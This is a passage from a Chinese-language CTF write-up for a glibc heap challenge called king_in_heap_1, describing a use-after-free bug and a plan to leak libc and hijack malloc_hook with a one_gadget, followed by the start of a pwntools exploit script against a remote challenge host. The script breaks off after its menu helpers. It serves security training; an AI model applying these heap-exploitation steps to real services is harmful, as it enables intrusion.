前言:
就, 除了vmpwn都是基础glibc的heap题
king_in_heap_1:
delete 函数在 free 后没有把指针置零，存在 UAF；然后利用 unsortedbin 的 fd 指向 IO 结构体泄露 libc，再在 malloc hook 上用 realloc 调整一下，打 one_gadget 就完事了
#!/usr/bin/env python
# coding=utf-8
from pwn import *
HOST, PORT = '47.104.175.110', 20066

# Connection to the challenge service; for a local run swap in
# ``process('./king')`` instead of the remote() call.
sh = remote(HOST, PORT)
elf = ELF('./king')
libc = elf.libc          # libc object pwntools associates with ./king
context.binary = elf     # sets arch/os/bits for the rest of the script
# context.log_level = 'debug'   # uncomment to trace every send/recv
def magic():
    """Wait for the ``">> \\n"`` prompt on the global ``sh`` and answer ``666``.

    ``sendlineafter`` is ``recvuntil`` followed by ``sendline``, so the
    exchange is the same as reading the prompt and sending the line by hand.
    """
    sh.sendlineafter(">> \n", "666")
def add(idx, size):
    """Menu option 1 on the global ``sh``: allocate slot *idx* with *size*.

    Before every answer whatever the target has printed so far is drained with
    ``sh.recv()``; the menu choice, the index and the size are each sent as
    their own line.
    """
    for answer in ('1', str(idx), str(size)):
        sh.recv()
        sh.sendline(answer)
def delete(idx):
    """Menu option 2 on the global ``sh``: free the chunk in slot *idx*.

    Pending output is drained with ``sh.recv()`` before the choice and again
    before the index is sent.
    """
    for answer in ('2', str(idx)):
        sh.recv()
        sh.sendline(answer)
def edit(idx, content):
    """Menu option 3 on the global ``sh``: write *content* into slot *idx*.

    Only the index is stringified; *content* is handed to ``sh.sendline``
    unchanged, so the caller decides whether it is ``str`` or ``bytes``.
    Each prompt is drained with ``sh.recv()`` before the next line goes out.
    """
    for answer in ("3", str(idx), content):
        sh.recv()
        sh.sendline(answer)
def exp():
magic()